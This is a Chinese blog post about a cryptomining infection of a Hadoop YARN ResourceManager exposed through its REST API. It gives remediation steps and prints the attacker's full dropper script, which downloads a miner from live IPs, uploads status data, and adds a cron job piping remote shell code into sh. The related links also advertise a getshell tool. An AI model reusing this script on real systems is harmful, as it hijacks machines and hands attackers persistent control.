YARN Resourcemanager引入挖矿病毒的经历

最新推荐文章于 2023-01-31 15:49:10 发布
最新推荐文章于 2023-01-31 15:49:10 发布
阅读量3.3k 收藏 2
点赞数
分类专栏: yarn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm709409753/article/details/80540715
版权

原因

由于同事为了测试方便,把YARN RM的8088对外网开放了,导致攻击者可以通过RM 的rest api直接可以提交应用。

解决参考博客

https://labitacoranet.wordpress.com/2018/05/16/forensic-analysis-of-a-cryptocurrency-mining-attack-in-a-big-data-cluster/

我解决的办法

  1. 关闭外网映射端口
  2. 删除伪装的可执行程序
  3. 查看相应的进程 ps aux | grep /var/tmp/java ,然后杀掉进程
  4. 通过bin/yarn application -list 列出应用,查看不是内部提交的应用,通过bin/yarn application -kill {appid} 杀掉进程
  5. crontab -e 删除定时下载任务
  6. 后期维护 yarn使用权限模块。

下面是远程下载的shell脚本 挖矿病毒的可执行脚本

#!/bin/bash

pkill -f cryptonight
pkill -f sustes
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
ps ax | grep "config.json -t" | grep -v grep | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf\|wm.conf\|wt.conf' | grep -v grep | grep 'ppl\|pscf\|ppc\|ppp' | awk '{print $1}' | xargs kill -9
rm -rf /var/tmp/pscf*
rm -rf /tmp/pscf*
DIR="/tmp"
if [ -a "/tmp/java" ]
then
    if [ -w "/tmp/java" ] && [ ! -d "/tmp/java" ]
    then
        if [ -x "$(command -v md5sum)" ]
        then
            sum=$(md5sum /tmp/java | awk '{ print $1 }')
            echo $sum
            case $sum in
                183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                    echo "Java OK"
                ;;
                *)
                    echo "Java wrong"
                    pkill -f w.conf
                    sleep 4
                ;;
            esac
        fi
        echo "P OK"
    else
        DIR=$(mktemp -d)/tmp
        mkdir $DIR
        echo "T DIR $DIR"
    fi
else
    if [ -d "/var/tmp" ]
    then
        DIR="/var/tmp"
    fi
    echo "P NOT EXISTS"
fi
if [ -d "/tmp/java" ]
then
    DIR=$(mktemp -d)/tmp
    mkdir $DIR
    echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
    WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
    WGET="wget -O";
fi
f2="185.222.210.59"

downloadIfNeed()
{
    if [ -x "$(command -v md5sum)" ]
    then
        if [ ! -f $DIR/java ]; then
            echo "File not found!"
            download
        fi
        sum=$(md5sum $DIR/java | awk '{ print $1 }')
        echo $sum
        case $sum in
            183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                echo "Java OK"
            ;;
            *)
                echo "Java wrong"
                sizeBefore=$(du $DIR/java)
                if [ -s /usr/bin/curl ];
                then
                    WGET="curl -k -o ";
                fi
                if [ -s /usr/bin/wget ];
                then
                    WGET="wget --no-check-certificate -O ";
                fi
                echo "" > $DIR/tmp.txt
                rm -rf $DIR/java
                download

                if [ -x "$(command -v md5sum)" ]
                then
                    sum=$(md5sum $DIR/java | awk '{ print $1 }')
                    echo $sum
                    case $sum in
                        183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                            echo "Java OK"
                            cp $DIR/java $DIR/ppc
                        ;;
                        *)
                            $WGET $DIR/java https://transfer.sh/6H16m/zzz > $DIR/tmp.txt 2>&1
                            echo "Java wrong"
                            sum=$(md5sum $DIR/java | awk '{ print $1 }')
                            case $sum in
                                183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                                    echo "Java OK"
                                    cp $DIR/java $DIR/ppc
                                ;;
                                *)
                                    echo "Java wrong2"
                                ;;
                            esac
                        ;;
                    esac
                else
                    echo "No md5sum"
                fi

                sumAfter=$(md5sum $DIR/java | awk '{ print $1 }')
                if [ -s /usr/bin/curl ];
                then
                    echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/java` >> $DIR/tmp.txt
                    curl -F "file=@$DIR/tmp.txt" http://$f2/re.php
                fi
            ;;
        esac
    else
        echo "No md5sum"
        download
    fi
}

download() {
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/ppc | awk '{ print $1 }')
        echo $sum
        case $sum in
            183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                echo "Java OK"
                cp $DIR/ppc $DIR/java
            ;;
            *)
                echo "Java wrong"
                download2
            ;;
        esac
    else
        echo "No md5sum"
        download2
    fi
}

download2() {
    f1=$(curl 185.222.210.59/g.php)
    if [ -z "$f1" ];
    then
        f1=$(wget -q -O - 185.222.210.59/g.php)
    fi

    if [ `getconf LONG_BIT` = "64" ]
    then
        $WGET $DIR/java http://$f1/xm64?$RANDOM
    else
        $WGET $DIR/java http://$f1/xm32?$RANDOM
    fi

    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/java | awk '{ print $1 }')
        echo $sum
        case $sum in
            183664ceb9c4d7179d5345249f1ee0c4 | b00f4bbd82d2f5ec7c8152625684f853)
                echo "Java OK"
                cp $DIR/java $DIR/ppc
            ;;
            *)
                echo "Java wrong"
            ;;
        esac
    else
        echo "No md5sum"
    fi
}


if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
    downloadIfNeed
    chmod +x $DIR/java
    $WGET $DIR/w.conf http://$f2/w.conf
    nohup $DIR/java -c $DIR/w.conf > /dev/null 2>&1 &
    sleep 5
    rm -rf $DIR/w.conf
else
    echo "Running"
fi
if crontab -l | grep -q "185.222.210.59"
then
    echo "Cron exists"
else
    echo "Cron not found"
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];
    then
        LDR="curl";
    fi
    if [ -s /usr/bin/wget ];
    then
        LDR="wget -q -O -";
    fi
    (crontab -l 2>/dev/null; echo "* * * * * $LDR http://185.222.210.59/cr.sh | sh > /dev/null 2>&1")| crontab -
fi
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf /tmp/pscd*
rm -rf /var/tmp/pscd*
crontab -l | sed '/192.99.142.232/d' | crontab -
crontab -l | sed '/192.99.142.226/d' | crontab -
crontab -l | sed '/192.99.142.248/d' | crontab -
crontab -l | sed '/logo4/d' | crontab -
crontab -l | sed '/logo9/d' | crontab -
crontab -l | sed '/logo0/d' | crontab -

另一问题

如果发现进程不在,但是在安装的时候,提示进程已经启动,然后让你关闭它。
这样的问题是由于主机或者服务异常关机或停止,pid文件没有及时的被删除或者没有被标记过时,再次启动的时候,服务进程会检查pid文件,如果存在,就不再启动进程。
解决很简单,找到相应的pid文件,删除掉,OK。另外,我还写过关于/tmp 文件存留的文章,最后不要把pid文件放到/tmp目录下,以免服务在启动或者关闭的时候,发生异常。
lm709409753
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Hadoop YARN ResourceManager 未授权访问getshell
09-23
利用Hadoop YARN ResourceManager 未授权访问getshell工具以及WORD说明
Yarn ResourceManager HA配置
03-14
Yarn ResourceManager HA 配置详解 Yarn ResourceManager HA 配置是指在 Hadoop 集群中实现 ResourceManager 的高可用性,确保集群的可靠性和稳定性。ResourceManagerYARN 中的核心组件,负责资源管理和调度。...
Yarn遭到病毒攻击
weixin_30485291的博客
01-16 864
测试环境在阿里云上暴露出了公网端口,前一段时间CDH集群原本是开启了Kerberos认证,但是因为大家反映使用麻烦,所以就又关闭了Kerberos。 最近几天大家普遍反映测试环境上hive和hdfs job执行很慢,yarn进程的cpu使用率持续在200%以上,经过排除CPU使用率已经连续两天100%且没有降下来,查看job如下 有39个job明细多余开发提交的任务数量,且User来自dr...
yarn程序被劫持运行机程序
capetown的博客
12-20 825
记一次问题排查过程,希望对他人有借鉴作用,不喜请喷。 一、基本现象 Nodemanager进程挂掉 2、yarn日志 进入系统查看yarn日志 #cd /var/log/hadoop-yarn/yarn #less yarn-yarn-nodemanager-so81.novalocal.log 发现没有异常错误信息 3、系统负载 通过top 命令结合c  M 查看使用cpu...
Hadoop基础之《(8)—yarn dr.who用户漏洞被
最新发布
csj50的专栏
01-31 834
dr.who用户执行了很多application,服务器被。因为yarn的8088端口REST API没有做权限控制,允许任意用户通过API创建任务。5、服务器上在/var/tmp/下就写入了11112222_test_11112222文件。1、检查/tmp和/var/tmp目录,删除异常文件。2、检查crontab -l,删除可疑脚本。2、构建json文件。
记一次CDH集群被下
张老湿的博客
05-04 2961
今天一上线看到集群cpu跑到100%,心里也是一跳,该不会是被下机了吧 top一下,果不其然有个占进程占了大部分的cpu PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 23429 yarn 20 0 4121432 985.4m 39116 S 1226.7 1.5 ...
加密采僵尸网路病毒还在蔓延! kinsing kdevtmpfsi redis yarn docker
SpringBoots的博客
04-14 632
解决步骤 如果你同样遇到了kdevtmpfsi异常进程,占用了非常高的CPU和出网带宽,影响到了你的正常业务,建议使用以下步骤解决 杀掉异常进程 ps -ef|grep kdevtmpfsi(异常进程) kill -9 pid 杀掉守护进程 杀掉kdevtmpfsi进程后,随后进程还会重启,还要杀掉守护进程 kinsing ps -ef|grep kinsing kill -9 pi...
Template Cluster YARN ResourceManager.xml
07-10
Zabbix监控Hadoop集群时用到的模板,可配合本人写的文章进行部署。
hadoop-yarn-server-resourcemanager-2.6.0-API文档-中文版.zip
04-23
赠送jar包:hadoop-yarn-server-resourcemanager-2.6.0.jar; 赠送原API文档:hadoop-yarn-server-resourcemanager-2.6.0-javadoc.jar; 赠送源代码:hadoop-yarn-server-resourcemanager-2.6.0-sources.jar; 赠送...
Yarn的操作.pdf
08-21
YARNResourceManager页面中,可以查看当前集群的资源总量、剩余资源和正在使用的资源情况。这里的资源指内存和CPU资源。在ResourceManager页面中,我们可以查看当前集群的资源使用情况,从而更好地规划和分配...
Yarn 问题发现与解决
weixin_34007291的博客
03-07 1881
2019独角兽企业重金招聘Python工程师标准>>> ...
Linux系统常见的病毒介绍(附解决方案)
makaisghr的专栏
06-16 8099
Linux系统常见的病毒介绍Linux系统常见的病毒介绍BillGatesDDGSystemdMinerStartMinerWatchdogsMinerXorDDosRainbowMiner Linux系统常见的病毒介绍 BillGates BillGates在2014年被首次发现,由于其样本中多变量及函数包含字符串”gates”而得名,该病毒主要被黑客用于DDos,其特点是会替换系统正常程序(ss、netstat、ps、lsof)进行伪装 主机中毒现象: [1] 在/tmp/目录下存在gates.lod、
教你从进程中判断出病毒和木马
虚拟等待的专栏
09-12 1346
任何病毒和木马存在于系统中,都无法彻底和进程脱离关系,即使采用了隐藏技术,也还是能够从进程中找到蛛丝马迹,因此,查看系统中活动的进程成为我们检测病毒木马最直接的方法。但是系统中同时运行的进程那么多,哪些是正常的系统进程,哪些是木马的进程,而经常被病毒木马假冒的系统进程在系统中又扮
yarn进程CPU占用率百分之百
love_lixr的博客
08-06 3855
阿里云出现程序 Linux根绝Pid查看进程名 top命令查看占用CPU高的进程 ps -aux | grep PID号 ps -ef | grep PID号 查看yarn程序的信息 ps -ef | grep yarn yarn 46185 1 99 May03 ?  4 - 19 : 04 : 28 / tmp / java - c / tmp / w.conf yarn...
Hadoop Yarn REST API未授权漏洞利用分析
jast
04-04 1200
目录 一、背景情况 二、 漏洞说明 攻击步骤: 三、入侵分析 四、安全建议 清理病毒 安全加固 五、IOCs 一、背景情况 5月5日腾讯云安全曾针对攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程执行代码的安全问题进行预警,在预警的前后我们曾多次捕获相关的攻击案例,其中就包含利用该问题进行,我们针对...
记录一次被僵尸攻击过程
qq_36101162的博客
05-07 629
病毒背景的了解来自这篇文章 https://blog.csdn.net/weixin_43970890/article/details/103857487 研究hadoop的时候提交作业到yarn上,结果8088端口开放到公网,被病毒攻击,只要一启动yarn就会执行kinsing(守护进程)以及kdevtmpfsi进程,cpu瞬间被占用到100%,服务器瘫痪。 同样的redis的6379...
记录一下排除攻击的过程
husongbo的博客
10-10 632
首先,我发现自己的服务器CPU占用率达到了99.9% WTF?虽然我用的是腾讯云的学生版只有1核,但是也不至于干满了啊 于是撸起袖子,先把这个进程杀掉 kill -9 PID ,然后顺着目录找到这个伪装成java的东西 把他干掉,通过crontab -l -u hadoop命令,发现了有定时任务再启动 进入cd /var/spool/cron/目录发现 看一下这个hadoop的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值